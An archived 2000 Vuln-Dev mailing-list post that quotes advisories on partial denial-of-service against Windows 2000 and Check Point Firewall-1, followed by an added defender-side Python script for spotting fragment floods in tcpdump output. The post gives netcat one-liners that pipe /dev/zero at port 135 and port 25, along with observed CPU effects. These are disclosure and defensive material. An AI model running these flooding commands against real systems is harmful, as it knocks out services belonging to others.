Vulnerability Development
mailing list archives
Win2k and /dev/zero
From: pete () S3 INTEGRALIS CO UK (Pete Philips)
Date: Mon, 3 Jul 2000 11:11:22 +0100
Anyone played with this yet?
SecureXpert Labs Advisory [SX-20000620-2] - Multiple ports/protocols
partial Denial of Service in Microsoft Windows 2000 Server
Summary
Multiple ports and protocols on Microsoft Windows 2000 Server are susceptible
to a simple network attack which raises CPU utilization on Windows 2000
Server to 100%.
My initial results (tested locally on a LAN) are:
Using:
% nc -u <host> 135 < /dev/zero
Results:
Win2k = 100% CPU for duration of attack
NT4 = 55% CPU for duration
NT4 + MS00-029 patch = No effect
The effect of the Jolt2 patch and tcpdump output indicate that
this is a fragmentation attack variation. My tests yielded multiple
fragments of the form:
20780:1480@various (Frag ID:size@offset)
Anyone tried the Firewall-1 variation?
SecureXpert Labs Advisory [SX-20000620-3] - Partial Denial of
Service in Check Point Firewall-1 on Windows NT
Sending a stream of binary zeros over the network to the SMTP port on the firewall
raises the target system's load to 100% while the load on the attacker's
system machine remains relatively low. This can easily be reproduced from
a Linux system using netcat with an input of /dev/zero, with a command such as
"nc firewall 25 < /dev/zero".
Pete.
---------------------------------------------------------------
| Pete Philips \|/ |
| Integralis S3 Team O |
| E-mail: pete.philips () integralis co uk |
| Phone: +44 118 930 6060 |
| PGP Key: http://www.s3.integralis.co.uk/pgp/pete.pgp |
---------------------------------------------------------------
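Added example, not part of the original post: a defender-side check for the fragment pattern reported above. It parses old-style `tcpdump -n` text lines carrying the (frag ID:size@offset) annotation and reports source/destination pairs whose peak fragment rate crosses a threshold; the sample lines, addresses, function names and the 100 fragments/second threshold are constructed assumptions.

```python
import re
from collections import Counter

# Old-style tcpdump -n text line ending in "(frag ID:size@offset[+])".
# Only the first fragment of a datagram carries ports, so ports are optional.
FRAG_RE = re.compile(
    r"^(?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d)\.\d+ "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)(?:\.\d+)? > (?P<dst>\d+\.\d+\.\d+\.\d+)(?:\.\d+)?:"
    r".*\(frag (?P<id>\d+):(?P<size>\d+)@(?P<off>\d+)\+?\)"
)

def fragment_floods(lines, threshold=100):
    """Return {(src, dst): peak fragments seen in any one second} for pairs
    whose peak is at or above the threshold (threshold is an assumed value)."""
    per_second = Counter()
    for line in lines:
        m = FRAG_RE.match(line)
        if m:
            sec = int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"])
            per_second[(m["src"], m["dst"], sec)] += 1
    peaks = {}
    for (src, dst, _), n in per_second.items():
        peaks[(src, dst)] = max(peaks.get((src, dst), 0), n)
    return {pair: n for pair, n in peaks.items() if n >= threshold}

def frag_line(ts, src, dst, ident, k):
    """Build fragment k (0..5) of one 8192-byte UDP datagram as a text line."""
    size, more = (800, "") if k == 5 else (1480, "+")
    if k == 0:
        return f"{ts} {src}.1025 > {dst}.135: udp 8192 (frag {ident}:{size}@0+)"
    return f"{ts} {src} > {dst}: (frag {ident}:{size}@{k * 1480}{more})"

def constructed_capture():
    """Constructed sample lines (documentation addresses), not a real capture."""
    lines = []
    for i in range(300):  # sustained stream: 50 datagrams x 6 fragments in 1 s
        lines.append(frag_line("11:11:22.%06d" % (i * 1000), "192.0.2.10",
                               "192.0.2.20", 20780 + i // 6, i % 6))
    for k in range(6):    # background: one fragmented datagram from another host
        lines.append(frag_line("11:11:23.%06d" % (k * 10), "192.0.2.30",
                               "192.0.2.20", 411, k))
    lines.append("11:11:23.500000 192.0.2.30.1030 > 192.0.2.20.25: S 1:1(0) win 8192")
    return lines

if __name__ == "__main__":
    for (src, dst), peak in fragment_floods(constructed_capture()).items():
        print(f"fragment flood: {src} -> {dst}, peak {peak} fragments/second")
```
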